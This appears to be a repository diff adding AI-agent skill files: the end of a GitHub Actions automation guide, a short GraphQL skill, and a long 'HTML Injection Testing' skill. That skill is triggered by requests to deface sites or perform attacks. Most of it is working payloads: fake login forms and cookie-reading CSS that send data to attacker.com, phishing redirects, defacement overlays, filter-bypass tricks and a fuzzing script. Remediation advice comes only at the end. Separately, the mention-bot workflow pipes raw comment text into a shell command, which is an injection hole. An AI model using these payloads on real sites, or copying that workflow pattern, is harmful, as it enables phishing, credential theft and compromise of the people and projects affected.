echo "version=$stable" >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Rollback
|
||||
run: |
|
||||
git checkout ${{ steps.stable.outputs.version }}
|
||||
# Deploy stable version
|
||||
npm run deploy
|
||||
|
||||
- name: Notify team
|
||||
uses: slackapi/slack-github-action@v1
|
||||
with:
|
||||
payload: |
|
||||
{
|
||||
"text": "🔄 Production rolled back to ${{ steps.stable.outputs.version }}",
|
||||
"blocks": [
|
||||
{
|
||||
"type": "section",
|
||||
"text": {
|
||||
"type": "mrkdwn",
|
||||
"text": "*Rollback executed*\n• Version: `${{ steps.stable.outputs.version }}`\n• Reason: ${{ inputs.reason }}\n• Triggered by: ${{ github.actor }}"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Git Operations
|
||||
|
||||
### 4.1 Automated Rebasing
|
||||
|
||||
```yaml
|
||||
# .github/workflows/auto-rebase.yml
|
||||
name: Auto Rebase
|
||||
|
||||
on:
|
||||
issue_comment:
|
||||
types: [created]
|
||||
|
||||
jobs:
|
||||
rebase:
|
||||
if: github.event.issue.pull_request && contains(github.event.comment.body, '/rebase')
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: Setup Git
|
||||
run: |
|
||||
git config user.name "github-actions[bot]"
|
||||
git config user.email "github-actions[bot]@users.noreply.github.com"
|
||||
|
||||
- name: Rebase PR
|
||||
run: |
|
||||
# Fetch PR branch
|
||||
gh pr checkout ${{ github.event.issue.number }}
|
||||
|
||||
# Rebase onto main
|
||||
git fetch origin main
|
||||
git rebase origin/main
|
||||
|
||||
# Force push
|
||||
git push --force-with-lease
|
||||
env:
|
||||
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: Comment result
|
||||
uses: actions/github-script@v7
|
||||
with:
|
||||
script: |
|
||||
github.rest.issues.createComment({
|
||||
owner: context.repo.owner,
|
||||
repo: context.repo.repo,
|
||||
issue_number: context.issue.number,
|
||||
body: '✅ Successfully rebased onto main!'
|
||||
})
|
||||
```
|
||||
|
||||
### 4.2 Smart Cherry-Pick
|
||||
|
||||
```typescript
|
||||
// AI-assisted cherry-pick that handles conflicts
|
||||
async function smartCherryPick(commitHash: string, targetBranch: string) {
|
||||
// Get commit info
|
||||
const commitInfo = await exec(`git show ${commitHash} --stat`);
|
||||
|
||||
// Check for potential conflicts
|
||||
const targetDiff = await exec(
|
||||
`git diff ${targetBranch}...HEAD -- ${affectedFiles}`
|
||||
);
|
||||
|
||||
// AI analysis
|
||||
const analysis = await ai.analyze(`
|
||||
I need to cherry-pick this commit to ${targetBranch}:
|
||||
|
||||
${commitInfo}
|
||||
|
||||
Current state of affected files on ${targetBranch}:
|
||||
${targetDiff}
|
||||
|
||||
Will there be conflicts? If so, suggest resolution strategy.
|
||||
`);
|
||||
|
||||
if (analysis.willConflict) {
|
||||
// Create branch for manual resolution
|
||||
await exec(
|
||||
`git checkout -b cherry-pick-${commitHash.slice(0, 7)} ${targetBranch}`
|
||||
);
|
||||
const result = await exec(`git cherry-pick ${commitHash}`, {
|
||||
allowFail: true,
|
||||
});
|
||||
|
||||
if (result.failed) {
|
||||
// AI-assisted conflict resolution
|
||||
const conflicts = await getConflicts();
|
||||
for (const conflict of conflicts) {
|
||||
const resolution = await ai.resolveConflict(conflict);
|
||||
await applyResolution(conflict.file, resolution);
|
||||
}
|
||||
}
|
||||
} else {
|
||||
await exec(`git checkout ${targetBranch}`);
|
||||
await exec(`git cherry-pick ${commitHash}`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 4.3 Branch Cleanup
|
||||
|
||||
```yaml
|
||||
# .github/workflows/branch-cleanup.yml
|
||||
name: Branch Cleanup
|
||||
|
||||
on:
|
||||
schedule:
|
||||
- cron: '0 0 * * 0' # Weekly
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
cleanup:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Find stale branches
|
||||
id: stale
|
||||
run: |
|
||||
# Branches not updated in 30 days
|
||||
stale=$(git for-each-ref --sort=-committerdate refs/remotes/origin \
|
||||
--format='%(refname:short) %(committerdate:relative)' | \
|
||||
grep -E '[3-9][0-9]+ days|[0-9]+ months|[0-9]+ years' | \
|
||||
grep -v 'origin/main\|origin/develop' | \
|
||||
cut -d' ' -f1 | sed 's|origin/||')
|
||||
|
||||
echo "branches<<EOF" >> $GITHUB_OUTPUT
|
||||
echo "$stale" >> $GITHUB_OUTPUT
|
||||
echo "EOF" >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Create cleanup PR
|
||||
if: steps.stale.outputs.branches != ''
|
||||
uses: actions/github-script@v7
|
||||
with:
|
||||
script: |
|
||||
const branches = `${{ steps.stale.outputs.branches }}`.split('\n').filter(Boolean);
|
||||
|
||||
const body = `## 🧹 Stale Branch Cleanup
|
||||
|
||||
The following branches haven't been updated in over 30 days:
|
||||
|
||||
${branches.map(b => `- \`${b}\``).join('\n')}
|
||||
|
||||
### Actions:
|
||||
- [ ] Review each branch
|
||||
- [ ] Delete branches that are no longer needed
|
||||
- Comment \`/keep branch-name\` to preserve specific branches
|
||||
`;
|
||||
|
||||
await github.rest.issues.create({
|
||||
owner: context.repo.owner,
|
||||
repo: context.repo.repo,
|
||||
title: 'Stale Branch Cleanup',
|
||||
body: body,
|
||||
labels: ['housekeeping']
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. On-Demand Assistance
|
||||
|
||||
### 5.1 @mention Bot
|
||||
|
||||
```yaml
|
||||
# .github/workflows/mention-bot.yml
|
||||
name: AI Mention Bot
|
||||
|
||||
on:
|
||||
issue_comment:
|
||||
types: [created]
|
||||
pull_request_review_comment:
|
||||
types: [created]
|
||||
|
||||
jobs:
|
||||
respond:
|
||||
if: contains(github.event.comment.body, '@ai-helper')
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
|
||||
- name: Extract question
|
||||
id: question
|
||||
run: |
|
||||
# Extract text after @ai-helper
|
||||
question=$(echo "${{ github.event.comment.body }}" | sed 's/.*@ai-helper//')
|
||||
echo "question=$question" >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Get context
|
||||
id: context
|
||||
run: |
|
||||
if [ "${{ github.event.issue.pull_request }}" != "" ]; then
|
||||
# It's a PR - get diff
|
||||
gh pr diff ${{ github.event.issue.number }} > context.txt
|
||||
else
|
||||
# It's an issue - get description
|
||||
gh issue view ${{ github.event.issue.number }} --json body -q .body > context.txt
|
||||
fi
|
||||
echo "context=$(cat context.txt)" >> $GITHUB_OUTPUT
|
||||
env:
|
||||
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: AI Response
|
||||
uses: actions/github-script@v7
|
||||
with:
|
||||
script: |
|
||||
const response = await ai.chat(`
|
||||
Context: ${process.env.CONTEXT}
|
||||
|
||||
Question: ${process.env.QUESTION}
|
||||
|
||||
Provide a helpful, specific answer. Include code examples if relevant.
|
||||
`);
|
||||
|
||||
await github.rest.issues.createComment({
|
||||
owner: context.repo.owner,
|
||||
repo: context.repo.repo,
|
||||
issue_number: context.issue.number,
|
||||
body: response
|
||||
});
|
||||
env:
|
||||
CONTEXT: ${{ steps.context.outputs.context }}
|
||||
QUESTION: ${{ steps.question.outputs.question }}
|
||||
```
|
||||
|
||||
### 5.2 Command Patterns
|
||||
|
||||
```markdown
|
||||
## Available Commands
|
||||
|
||||
| Command | Description |
|
||||
| :------------------- | :-------------------------- |
|
||||
| `@ai-helper explain` | Explain the code in this PR |
|
||||
| `@ai-helper review` | Request AI code review |
|
||||
| `@ai-helper fix` | Suggest fixes for issues |
|
||||
| `@ai-helper test` | Generate test cases |
|
||||
| `@ai-helper docs` | Generate documentation |
|
||||
| `/rebase` | Rebase PR onto main |
|
||||
| `/update` | Update PR branch from main |
|
||||
| `/approve` | Mark as approved by bot |
|
||||
| `/label bug` | Add 'bug' label |
|
||||
| `/assign @user` | Assign to user |
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Repository Configuration
|
||||
|
||||
### 6.1 CODEOWNERS
|
||||
|
||||
```
|
||||
# .github/CODEOWNERS
|
||||
|
||||
# Global owners
|
||||
* @org/core-team
|
||||
|
||||
# Frontend
|
||||
/src/frontend/ @org/frontend-team
|
||||
*.tsx @org/frontend-team
|
||||
*.css @org/frontend-team
|
||||
|
||||
# Backend
|
||||
/src/api/ @org/backend-team
|
||||
/src/database/ @org/backend-team
|
||||
|
||||
# Infrastructure
|
||||
/.github/ @org/devops-team
|
||||
/terraform/ @org/devops-team
|
||||
Dockerfile @org/devops-team
|
||||
|
||||
# Docs
|
||||
/docs/ @org/docs-team
|
||||
*.md @org/docs-team
|
||||
|
||||
# Security-sensitive
|
||||
/src/auth/ @org/security-team
|
||||
/src/crypto/ @org/security-team
|
||||
```
|
||||
|
||||
### 6.2 Branch Protection
|
||||
|
||||
```yaml
|
||||
# Set up via GitHub API
|
||||
- name: Configure branch protection
|
||||
uses: actions/github-script@v7
|
||||
with:
|
||||
script: |
|
||||
await github.rest.repos.updateBranchProtection({
|
||||
owner: context.repo.owner,
|
||||
repo: context.repo.repo,
|
||||
branch: 'main',
|
||||
required_status_checks: {
|
||||
strict: true,
|
||||
contexts: ['test', 'lint', 'ai-review']
|
||||
},
|
||||
enforce_admins: true,
|
||||
required_pull_request_reviews: {
|
||||
required_approving_review_count: 1,
|
||||
require_code_owner_reviews: true,
|
||||
dismiss_stale_reviews: true
|
||||
},
|
||||
restrictions: null,
|
||||
required_linear_history: true,
|
||||
allow_force_pushes: false,
|
||||
allow_deletions: false
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Best Practices
|
||||
|
||||
### Security
|
||||
|
||||
- [ ] Store API keys in GitHub Secrets
|
||||
- [ ] Use minimal permissions in workflows
|
||||
- [ ] Validate all inputs
|
||||
- [ ] Don't expose sensitive data in logs
|
||||
|
||||
### Performance
|
||||
|
||||
- [ ] Cache dependencies
|
||||
- [ ] Use matrix builds for parallel testing
|
||||
- [ ] Skip unnecessary jobs with path filters
|
||||
- [ ] Use self-hosted runners for heavy workloads
|
||||
|
||||
### Reliability
|
||||
|
||||
- [ ] Add timeouts to jobs
|
||||
- [ ] Handle rate limits gracefully
|
||||
- [ ] Implement retry logic
|
||||
- [ ] Have rollback procedures
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Gemini CLI GitHub Action](https://github.com/google-github-actions/run-gemini-cli)
|
||||
- [GitHub Actions Documentation](https://docs.github.com/en/actions)
|
||||
- [GitHub REST API](https://docs.github.com/en/rest)
|
||||
- [CODEOWNERS Syntax](https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/about-code-owners)
|
||||
68
skills/graphql/SKILL.md
Normal file
68
skills/graphql/SKILL.md
Normal file
@@ -0,0 +1,68 @@
|
||||
---
|
||||
name: graphql
|
||||
description: "GraphQL gives clients exactly the data they need - no more, no less. One endpoint, typed schema, introspection. But the flexibility that makes it powerful also makes it dangerous. Without proper controls, clients can craft queries that bring down your server. This skill covers schema design, resolvers, DataLoader for N+1 prevention, federation for microservices, and client integration with Apollo/urql. Key insight: GraphQL is a contract. The schema is the API documentation. Design it carefully."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# GraphQL
|
||||
|
||||
You're a developer who has built GraphQL APIs at scale. You've seen the
|
||||
N+1 query problem bring down production servers. You've watched clients
|
||||
craft deeply nested queries that took minutes to resolve. You know that
|
||||
GraphQL's power is also its danger.
|
||||
|
||||
Your hard-won lessons: The team that didn't use DataLoader had unusable
|
||||
APIs. The team that allowed unlimited query depth got DDoS'd by their
|
||||
own clients. The team that made everything nullable couldn't distinguish
|
||||
errors from empty data. You've l
|
||||
|
||||
## Capabilities
|
||||
|
||||
- graphql-schema-design
|
||||
- graphql-resolvers
|
||||
- graphql-federation
|
||||
- graphql-subscriptions
|
||||
- graphql-dataloader
|
||||
- graphql-codegen
|
||||
- apollo-server
|
||||
- apollo-client
|
||||
- urql
|
||||
|
||||
## Patterns
|
||||
|
||||
### Schema Design
|
||||
|
||||
Type-safe schema with proper nullability
|
||||
|
||||
### DataLoader for N+1 Prevention
|
||||
|
||||
Batch and cache database queries
|
||||
|
||||
### Apollo Client Caching
|
||||
|
||||
Normalized cache with type policies
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ No DataLoader
|
||||
|
||||
### ❌ No Query Depth Limiting
|
||||
|
||||
### ❌ Authorization in Schema
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Each resolver makes separate database queries | critical | # USE DATALOADER |
|
||||
| Deeply nested queries can DoS your server | critical | # LIMIT QUERY DEPTH AND COMPLEXITY |
|
||||
| Introspection enabled in production exposes your schema | high | # DISABLE INTROSPECTION IN PRODUCTION |
|
||||
| Authorization only in schema directives, not resolvers | high | # AUTHORIZE IN RESOLVERS |
|
||||
| Authorization on queries but not on fields | high | # FIELD-LEVEL AUTHORIZATION |
|
||||
| Non-null field failure nullifies entire parent | medium | # DESIGN NULLABILITY INTENTIONALLY |
|
||||
| Expensive queries treated same as cheap ones | medium | # QUERY COST ANALYSIS |
|
||||
| Subscriptions not properly cleaned up | medium | # PROPER SUBSCRIPTION CLEANUP |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `backend`, `postgres-wizard`, `nextjs-app-router`, `react-patterns`
|
||||
495
skills/html-injection-testing/SKILL.md
Normal file
495
skills/html-injection-testing/SKILL.md
Normal file
@@ -0,0 +1,495 @@
|
||||
---
|
||||
name: HTML Injection Testing
|
||||
description: This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". It provides comprehensive HTML injection attack techniques and testing methodologies.
|
||||
---
|
||||
|
||||
# HTML Injection Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Tools
|
||||
- Web browser with developer tools
|
||||
- Burp Suite or OWASP ZAP
|
||||
- Tamper Data or similar proxy
|
||||
- cURL for testing payloads
|
||||
|
||||
### Required Knowledge
|
||||
- HTML fundamentals
|
||||
- HTTP request/response structure
|
||||
- Web application input handling
|
||||
- Difference between HTML injection and XSS
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **Vulnerability Report** - Identified injection points
|
||||
2. **Exploitation Proof** - Demonstrated content manipulation
|
||||
3. **Impact Assessment** - Potential phishing and defacement risks
|
||||
4. **Remediation Guidance** - Input validation recommendations
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Understanding HTML Injection
|
||||
|
||||
HTML injection occurs when user input is reflected in web pages without proper sanitization:
|
||||
|
||||
```html
|
||||
<!-- Vulnerable code example -->
|
||||
<div>
|
||||
Welcome, <?php echo $_GET['name']; ?>
|
||||
</div>
|
||||
|
||||
<!-- Attack input -->
|
||||
?name=<h1>Injected Content</h1>
|
||||
|
||||
<!-- Rendered output -->
|
||||
<div>
|
||||
Welcome, <h1>Injected Content</h1>
|
||||
</div>
|
||||
```
|
||||
|
||||
Key differences from XSS:
|
||||
- HTML injection: Only HTML tags are rendered
|
||||
- XSS: JavaScript code is executed
|
||||
- HTML injection is often stepping stone to XSS
|
||||
|
||||
Attack goals:
|
||||
- Modify website appearance (defacement)
|
||||
- Create fake login forms (phishing)
|
||||
- Inject malicious links
|
||||
- Display misleading content
|
||||
|
||||
### Phase 2: Identifying Injection Points
|
||||
|
||||
Map application for potential injection surfaces:
|
||||
|
||||
```
|
||||
1. Search bars and search results
|
||||
2. Comment sections
|
||||
3. User profile fields
|
||||
4. Contact forms and feedback
|
||||
5. Registration forms
|
||||
6. URL parameters reflected on page
|
||||
7. Error messages
|
||||
8. Page titles and headers
|
||||
9. Hidden form fields
|
||||
10. Cookie values reflected on page
|
||||
```
|
||||
|
||||
Common vulnerable parameters:
|
||||
```
|
||||
?name=
|
||||
?user=
|
||||
?search=
|
||||
?query=
|
||||
?message=
|
||||
?title=
|
||||
?content=
|
||||
?redirect=
|
||||
?url=
|
||||
?page=
|
||||
```
|
||||
|
||||
### Phase 3: Basic HTML Injection Testing
|
||||
|
||||
Test with simple HTML tags:
|
||||
|
||||
```html
|
||||
<!-- Basic text formatting -->
|
||||
<h1>Test Injection</h1>
|
||||
<b>Bold Text</b>
|
||||
<i>Italic Text</i>
|
||||
<u>Underlined Text</u>
|
||||
<font color="red">Red Text</font>
|
||||
|
||||
<!-- Structural elements -->
|
||||
<div style="background:red;color:white;padding:10px">Injected DIV</div>
|
||||
<p>Injected paragraph</p>
|
||||
<br><br><br>Line breaks
|
||||
|
||||
<!-- Links -->
|
||||
<a href="http://attacker.com">Click Here</a>
|
||||
<a href="http://attacker.com">Legitimate Link</a>
|
||||
|
||||
<!-- Images -->
|
||||
<img src="http://attacker.com/image.png">
|
||||
<img src="x" onerror="alert(1)"> <!-- XSS attempt -->
|
||||
```
|
||||
|
||||
Testing workflow:
|
||||
```bash
|
||||
# Test basic injection
|
||||
curl "http://target.com/search?q=<h1>Test</h1>"
|
||||
|
||||
# Check if HTML renders in response
|
||||
curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"
|
||||
|
||||
# Test in URL-encoded form
|
||||
curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"
|
||||
```
|
||||
|
||||
### Phase 4: Types of HTML Injection
|
||||
|
||||
#### Stored HTML Injection
|
||||
|
||||
Payload persists in database:
|
||||
|
||||
```html
|
||||
<!-- Profile bio injection -->
|
||||
Name: John Doe
|
||||
Bio: <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;">
|
||||
<h1>Site Under Maintenance</h1>
|
||||
<p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
|
||||
</div>
|
||||
|
||||
<!-- Comment injection -->
|
||||
Great article!
|
||||
<form action="http://attacker.com/steal" method="POST">
|
||||
<input name="username" placeholder="Session expired. Enter username:">
|
||||
<input name="password" type="password" placeholder="Password:">
|
||||
<input type="submit" value="Login">
|
||||
</form>
|
||||
```
|
||||
|
||||
#### Reflected GET Injection
|
||||
|
||||
Payload in URL parameters:
|
||||
|
||||
```html
|
||||
<!-- URL injection -->
|
||||
http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">
|
||||
|
||||
<!-- Search result injection -->
|
||||
http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>
|
||||
```
|
||||
|
||||
#### Reflected POST Injection
|
||||
|
||||
Payload in POST data:
|
||||
|
||||
```bash
|
||||
# POST injection test
|
||||
curl -X POST -d "comment=<div style='color:red'>Malicious Content</div>" \
|
||||
http://target.com/submit
|
||||
|
||||
# Form field injection
|
||||
curl -X POST -d "name=<script>alert(1)</script>&email=test@test.com" \
|
||||
http://target.com/register
|
||||
```
|
||||
|
||||
#### URL-Based Injection
|
||||
|
||||
Inject into displayed URLs:
|
||||
|
||||
```html
|
||||
<!-- If URL is displayed on page -->
|
||||
http://target.com/page/<h1>Injected</h1>
|
||||
|
||||
<!-- Path-based injection -->
|
||||
http://target.com/users/<img src=x>/profile
|
||||
```
|
||||
|
||||
### Phase 5: Phishing Attack Construction
|
||||
|
||||
Create convincing phishing forms:
|
||||
|
||||
```html
|
||||
<!-- Fake login form overlay -->
|
||||
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
|
||||
background:white;z-index:9999;padding:50px;">
|
||||
<h2>Session Expired</h2>
|
||||
<p>Your session has expired. Please log in again.</p>
|
||||
<form action="http://attacker.com/capture" method="POST">
|
||||
<label>Username:</label><br>
|
||||
<input type="text" name="username" style="width:200px;"><br><br>
|
||||
<label>Password:</label><br>
|
||||
<input type="password" name="password" style="width:200px;"><br><br>
|
||||
<input type="submit" value="Login">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<!-- Hidden credential stealer -->
|
||||
<style>
|
||||
input { background: url('http://attacker.com/log?data=') }
|
||||
</style>
|
||||
<form action="http://attacker.com/steal" method="POST">
|
||||
<input name="user" placeholder="Verify your username">
|
||||
<input name="pass" type="password" placeholder="Verify your password">
|
||||
<button>Verify</button>
|
||||
</form>
|
||||
```
|
||||
|
||||
URL-encoded phishing link:
|
||||
```
|
||||
http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E
|
||||
```
|
||||
|
||||
### Phase 6: Defacement Payloads
|
||||
|
||||
Website appearance manipulation:
|
||||
|
||||
```html
|
||||
<!-- Full page overlay -->
|
||||
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
|
||||
background:#000;color:#0f0;z-index:9999;
|
||||
display:flex;justify-content:center;align-items:center;">
|
||||
<h1>HACKED BY SECURITY TESTER</h1>
|
||||
</div>
|
||||
|
||||
<!-- Content replacement -->
|
||||
<style>body{display:none}</style>
|
||||
<body style="display:block !important">
|
||||
<h1>This site has been compromised</h1>
|
||||
</body>
|
||||
|
||||
<!-- Image injection -->
|
||||
<img src="http://attacker.com/defaced.jpg"
|
||||
style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999">
|
||||
|
||||
<!-- Marquee injection (visible movement) -->
|
||||
<marquee behavior="alternate" style="font-size:50px;color:red;">
|
||||
SECURITY VULNERABILITY DETECTED
|
||||
</marquee>
|
||||
```
|
||||
|
||||
### Phase 7: Advanced Injection Techniques
|
||||
|
||||
#### CSS Injection
|
||||
|
||||
```html
|
||||
<!-- Style injection -->
|
||||
<style>
|
||||
body { background: url('http://attacker.com/track?cookie='+document.cookie) }
|
||||
.content { display: none }
|
||||
.fake-content { display: block }
|
||||
</style>
|
||||
|
||||
<!-- Inline style injection -->
|
||||
<div style="background:url('http://attacker.com/log')">Content</div>
|
||||
```
|
||||
|
||||
#### Meta Tag Injection
|
||||
|
||||
```html
|
||||
<!-- Redirect via meta refresh -->
|
||||
<meta http-equiv="refresh" content="0;url=http://attacker.com/phish">
|
||||
|
||||
<!-- CSP bypass attempt -->
|
||||
<meta http-equiv="Content-Security-Policy" content="default-src *">
|
||||
```
|
||||
|
||||
#### Form Action Override
|
||||
|
||||
```html
|
||||
<!-- Hijack existing form -->
|
||||
<form action="http://attacker.com/steal">
|
||||
|
||||
<!-- If form already exists, add input -->
|
||||
<input type="hidden" name="extra" value="data">
|
||||
</form>
|
||||
```
|
||||
|
||||
#### iframe Injection
|
||||
|
||||
```html
|
||||
<!-- Embed external content -->
|
||||
<iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe>
|
||||
|
||||
<!-- Invisible tracking iframe -->
|
||||
<iframe src="http://attacker.com/track" style="display:none"></iframe>
|
||||
```
|
||||
|
||||
### Phase 8: Bypass Techniques
|
||||
|
||||
Evade basic filters:
|
||||
|
||||
```html
|
||||
<!-- Case variations -->
|
||||
<H1>Test</H1>
|
||||
<ScRiPt>alert(1)</ScRiPt>
|
||||
|
||||
<!-- Encoding variations -->
|
||||
<h1>Encoded</h1>
|
||||
%3Ch1%3EURL%20Encoded%3C%2Fh1%3E
|
||||
|
||||
<!-- Tag splitting -->
|
||||
<h
|
||||
1>Split Tag</h1>
|
||||
|
||||
<!-- Null bytes -->
|
||||
<h1%00>Null Byte</h1>
|
||||
|
||||
<!-- Double encoding -->
|
||||
%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E
|
||||
|
||||
<!-- Unicode encoding -->
|
||||
\u003ch1\u003eUnicode\u003c/h1\u003e
|
||||
|
||||
<!-- Attribute-based -->
|
||||
<div onmouseover="alert(1)">Hover me</div>
|
||||
<img src=x onerror=alert(1)>
|
||||
```
|
||||
|
||||
### Phase 9: Automated Testing
|
||||
|
||||
#### Using Burp Suite
|
||||
|
||||
```
|
||||
1. Capture request with potential injection point
|
||||
2. Send to Intruder
|
||||
3. Mark parameter value as payload position
|
||||
4. Load HTML injection wordlist
|
||||
5. Start attack
|
||||
6. Filter responses for rendered HTML
|
||||
7. Manually verify successful injections
|
||||
```
|
||||
|
||||
#### Using OWASP ZAP
|
||||
|
||||
```
|
||||
1. Spider the target application
|
||||
2. Active Scan with HTML injection rules
|
||||
3. Review Alerts for injection findings
|
||||
4. Validate findings manually
|
||||
```
|
||||
|
||||
#### Custom Fuzzing Script
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import requests
|
||||
import urllib.parse
|
||||
|
||||
target = "http://target.com/search"
|
||||
param = "q"
|
||||
|
||||
payloads = [
|
||||
"<h1>Test</h1>",
|
||||
"<b>Bold</b>",
|
||||
"<script>alert(1)</script>",
|
||||
"<img src=x onerror=alert(1)>",
|
||||
"<a href='http://evil.com'>Click</a>",
|
||||
"<div style='color:red'>Styled</div>",
|
||||
"<marquee>Moving</marquee>",
|
||||
"<iframe src='http://evil.com'></iframe>",
|
||||
]
|
||||
|
||||
for payload in payloads:
|
||||
encoded = urllib.parse.quote(payload)
|
||||
url = f"{target}?{param}={encoded}"
|
||||
|
||||
try:
|
||||
response = requests.get(url, timeout=5)
|
||||
if payload.lower() in response.text.lower():
|
||||
print(f"[+] Possible injection: {payload}")
|
||||
elif "<h1>" in response.text or "<b>" in response.text:
|
||||
print(f"[?] Partial reflection: {payload}")
|
||||
except Exception as e:
|
||||
print(f"[-] Error: {e}")
|
||||
```
|
||||
|
||||
### Phase 10: Prevention and Remediation
|
||||
|
||||
Secure coding practices:
|
||||
|
||||
```php
|
||||
// PHP: Escape output
|
||||
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
|
||||
|
||||
// PHP: Strip tags
|
||||
echo strip_tags($user_input);
|
||||
|
||||
// PHP: Allow specific tags only
|
||||
echo strip_tags($user_input, '<p><b><i>');
|
||||
```
|
||||
|
||||
```python
|
||||
# Python: HTML escape
|
||||
from html import escape
|
||||
safe_output = escape(user_input)
|
||||
|
||||
# Python Flask: Auto-escaping
|
||||
{{ user_input }} # Jinja2 escapes by default
|
||||
{{ user_input | safe }} # Marks as safe (dangerous!)
|
||||
```
|
||||
|
||||
```javascript
|
||||
// JavaScript: Text content (safe)
|
||||
element.textContent = userInput;
|
||||
|
||||
// JavaScript: innerHTML (dangerous!)
|
||||
element.innerHTML = userInput; // Vulnerable!
|
||||
|
||||
// JavaScript: Sanitize
|
||||
const clean = DOMPurify.sanitize(userInput);
|
||||
element.innerHTML = clean;
|
||||
```
|
||||
|
||||
Server-side protections:
|
||||
- Input validation (whitelist allowed characters)
|
||||
- Output encoding (context-aware escaping)
|
||||
- Content Security Policy (CSP) headers
|
||||
- Web Application Firewall (WAF) rules
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Common Test Payloads
|
||||
|
||||
| Payload | Purpose |
|
||||
|---------|---------|
|
||||
| `<h1>Test</h1>` | Basic rendering test |
|
||||
| `<b>Bold</b>` | Simple formatting |
|
||||
| `<a href="evil.com">Link</a>` | Link injection |
|
||||
| `<img src=x>` | Image tag test |
|
||||
| `<div style="color:red">` | Style injection |
|
||||
| `<form action="evil.com">` | Form hijacking |
|
||||
|
||||
### Injection Contexts
|
||||
|
||||
| Context | Test Approach |
|
||||
|---------|---------------|
|
||||
| URL parameter | `?param=<h1>test</h1>` |
|
||||
| Form field | POST with HTML payload |
|
||||
| Cookie value | Inject via document.cookie |
|
||||
| HTTP header | Inject in Referer/User-Agent |
|
||||
| File upload | HTML file with malicious content |
|
||||
|
||||
### Encoding Types
|
||||
|
||||
| Type | Example |
|
||||
|------|---------|
|
||||
| URL encoding | `%3Ch1%3E` = `<h1>` |
|
||||
| HTML entities | `<h1>` = `<h1>` |
|
||||
| Double encoding | `%253C` = `<` |
|
||||
| Unicode | `\u003c` = `<` |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Attack Limitations
|
||||
- Modern browsers may sanitize some injections
|
||||
- CSP can prevent inline styles and scripts
|
||||
- WAFs may block common payloads
|
||||
- Some applications escape output properly
|
||||
|
||||
### Testing Considerations
|
||||
- Distinguish between HTML injection and XSS
|
||||
- Verify visual impact in browser
|
||||
- Test in multiple browsers
|
||||
- Check for stored vs reflected
|
||||
|
||||
### Severity Assessment
|
||||
- Lower severity than XSS (no script execution)
|
||||
- Higher impact when combined with phishing
|
||||
- Consider defacement/reputation damage
|
||||
- Evaluate credential theft potential
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solutions |
|
||||
|-------|-----------|
|
||||
| HTML not rendering | Check if output HTML-encoded; try encoding variations; verify HTML context |
|
||||
| Payload stripped | Use encoding variations; try tag splitting; test null bytes; nested tags |
|
||||
| XSS not working (HTML only) | JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects |
|
||||
42
